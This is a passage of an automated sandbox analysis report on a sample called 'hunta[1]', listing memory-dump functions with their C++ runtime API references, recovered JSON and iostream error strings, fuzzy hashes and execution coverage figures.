                                    • Opcode Fuzzy Hash: 7bf2def2c25cdfcc67e84c51f2da82f9f45fb282af431bc9872c0bda201835a8
                                    • Instruction Fuzzy Hash: 85419634E002089BCF10DF69C880A9F7BB5BF45364F288165E8159B292DB35EE15EF91
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00EE9263
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00EE9286
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00EE92A6
                                    • std::_Facet_Register.LIBCPMT ref: 00EE931B
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00EE9333
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00EE934B
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: f3a80943b20882d878f83964762941d1adc40e3aec47157731046832193eb641
                                    • Instruction ID: 15a44984bd2937195548da19172fedbbcd48e79c8355855d544e3e7b4201dbe6
                                    • Opcode Fuzzy Hash: f3a80943b20882d878f83964762941d1adc40e3aec47157731046832193eb641
                                    • Instruction Fuzzy Hash: 4241D071900259AFCF14DF98E881BAEBBB4FB05714F144259E914BB3A2E734AD04CBD1
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00E860F2
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00E8617F
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00E86248
                                    Strings
                                    • recursive_directory_iterator::operator++, xrefs: 00E861CC
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy$___std_exception_copy
                                    • String ID: recursive_directory_iterator::operator++
                                    • API String ID: 1206660477-953255998
                                    • Opcode ID: 89887d5558882277c18a04cc14ae53da7d10d08bacc312b2b4dc06325e1e4f64
                                    • Instruction ID: cd100b714313b2d75725099ee265512359fa16a9824b477162a0e9d846f703c0
                                    • Opcode Fuzzy Hash: 89887d5558882277c18a04cc14ae53da7d10d08bacc312b2b4dc06325e1e4f64
                                    • Instruction Fuzzy Hash: 51E125B19006049FDB28EF68CC45BAEB7F9FF44300F14461DE45AA7781EB74A948CBA1
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00E886DE
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00E886ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: at line $, column
                                    • API String ID: 4194217158-191570568
                                    • Opcode ID: 9397cd874c7b7f30ed6e4eaeb0e5d64011924d06b26cfa50f97658cb38c8a4c6
                                    • Instruction ID: dc3126f153b7455f13d0869592c56bcb8b0bcd4c9f482ef0f90fed6b649d9006
                                    • Opcode Fuzzy Hash: 9397cd874c7b7f30ed6e4eaeb0e5d64011924d06b26cfa50f97658cb38c8a4c6
                                    • Instruction Fuzzy Hash: 28616A71D002049FDB08DF68CD8579EBBB5FF44310F144218E819B7782EB74AA84D795
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00EF4109
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00EF4122
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: value
                                    • API String ID: 4194217158-494360628
                                    • Opcode ID: 93e3a214772809458b6b4c23e1e4fa5485542b38f22dbda4966a084e4dc35477
                                    • Instruction ID: d78d3eb3cfa18823a08f7af2e09d0964d9ffd3fc8d10605df98b030329c449ec
                                    • Opcode Fuzzy Hash: 93e3a214772809458b6b4c23e1e4fa5485542b38f22dbda4966a084e4dc35477
                                    • Instruction Fuzzy Hash: 4751AFB0C0024CDBEF14DBA4CC85BEEBBB4AF05304F148259E545B7782DB796A88DB61
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00E83C0F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                    • API String ID: 2659868963-1866435925
                                    • Opcode ID: db0a51ffb02d572d3dbe5cd25aeb4e5b76e6f6466b01fb5fd9d9aa43ee371135
                                    • Instruction ID: d38282643a5ea793e111c95dce8849b8e36d8e5fa0351b0932c593101993da22
                                    • Opcode Fuzzy Hash: db0a51ffb02d572d3dbe5cd25aeb4e5b76e6f6466b01fb5fd9d9aa43ee371135
                                    • Instruction Fuzzy Hash: 8611C3B29007046BC710EE68D805A96B3E8AF05710F18852AFE5C9B242F774AA149BA1
                                    Strings
                                    • unordered_map/set too long, xrefs: 00EF2BD3
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: unordered_map/set too long
                                    • API String ID: 0-306623848
                                    • Opcode ID: 4811b98eb665683169139149f0abbe74905aea30da4a49044ca67c6799861bff
                                    • Instruction ID: 336892515c5033d7dc9359a5f66a5129c4611d15d6c0fafa215645d6caba64a4
                                    • Opcode Fuzzy Hash: 4811b98eb665683169139149f0abbe74905aea30da4a49044ca67c6799861bff
                                    • Instruction Fuzzy Hash: 63E1C471A005099FCB18DF68C891AB9B7E5FF88314F14836DEA19AB395E730ED51CB90
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00E8844D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID: parse error$ror
                                    • API String ID: 2659868963-4201802366
                                    • Opcode ID: 6997eb101b6265c4146a943fc46d5e13fa111e4bc321a415182f37498fc3e088
                                    • Instruction ID: d670436caffc0337682e11ec04dff5cfb1fbdd5ef40749c1d2183b63b26454f2
                                    • Opcode Fuzzy Hash: 6997eb101b6265c4146a943fc46d5e13fa111e4bc321a415182f37498fc3e088
                                    • Instruction Fuzzy Hash: BBC12571D00249DFEB08DF68CD85BADBB71FF55304F548248E818BB692DB74AA84CB91
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00E88051
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00E88060
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: [json.exception.
                                    • API String ID: 4194217158-791563284
                                    • Opcode ID: 404475054dbe0d4bd7e8db3ae534b67048968612eb5417280c5f0d9b00f60aa1
                                    • Instruction ID: c20e13124c8e298536ded6080801ab43d26a617c4d45a90d379db22c3873c51d
                                    • Opcode Fuzzy Hash: 404475054dbe0d4bd7e8db3ae534b67048968612eb5417280c5f0d9b00f60aa1
                                    • Instruction Fuzzy Hash: 6D9128709002489FDB18DFA8CC85B9EFBB1FF55314F64425CE448BB692D774A984C791
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00E83C0F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID: ios_base::badbit set$ios_base::failbit set
                                    • API String ID: 2659868963-1240500531
                                    • Opcode ID: d3b81b9b22df8adc13444e368e0da86b4b6d9ba919ac2b619d7534d3c394f2d2
                                    • Instruction ID: ced74dad8eaed718eff77fce73e794ca9778638d638ad8cbf06681871e818aea
                                    • Opcode Fuzzy Hash: d3b81b9b22df8adc13444e368e0da86b4b6d9ba919ac2b619d7534d3c394f2d2
                                    • Instruction Fuzzy Hash: BD41E4B1900604ABCB04EF68CC45BAAF7F9FF45710F188219F91DA7681E774AA44CBA1
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00EF4AB9
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00EF4AD2
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00EF55DD
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00EF55F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: value
                                    • API String ID: 4194217158-494360628
                                    • Opcode ID: a010f639291026d54c35ddb2048d129fa3eb144a53919d535faabbb3dbea5112
                                    • Instruction ID: d9b536a5f9355a658bc44b4006749103a16dab4b1a5ee9419ffa7a598cbf4405
                                    • Opcode Fuzzy Hash: a010f639291026d54c35ddb2048d129fa3eb144a53919d535faabbb3dbea5112
                                    • Instruction Fuzzy Hash: A3519DB1C0025C9BDF14DFA4CC89BEEBBB4AF15304F144259E505B7382DB74AA889B91
                                    APIs
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00EF9681
                                    Strings
                                    • type must be string, but is , xrefs: 00EF96E8
                                    • type must be boolean, but is , xrefs: 00EF9772
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Concurrency::cancel_current_task
                                    • String ID: type must be boolean, but is $type must be string, but is
                                    • API String ID: 118556049-436076039
                                    • Opcode ID: f5eff939d4ca5d7d52854dadaea9be7ec673a81116070c2706b36ea73f186712
                                    • Instruction ID: 8ece08fa6eb81acb30c53e8e84c3dac79ddcd912df6b735dcd8a16e870bcfb38
                                    • Opcode Fuzzy Hash: f5eff939d4ca5d7d52854dadaea9be7ec673a81116070c2706b36ea73f186712
                                    • Instruction Fuzzy Hash: 24316CB1D0024CAFCB08EBA4D842BAD77E9EF04314F140169F919E7693EB39AE04C752

                                    Execution Graph

                                    Execution Coverage:32.3%
                                    Dynamic/Decrypted Code Coverage:10.4%
                                    Signature Coverage:16.5%
                                    Total number of Nodes:297
                                    Total number of Limit Nodes:11
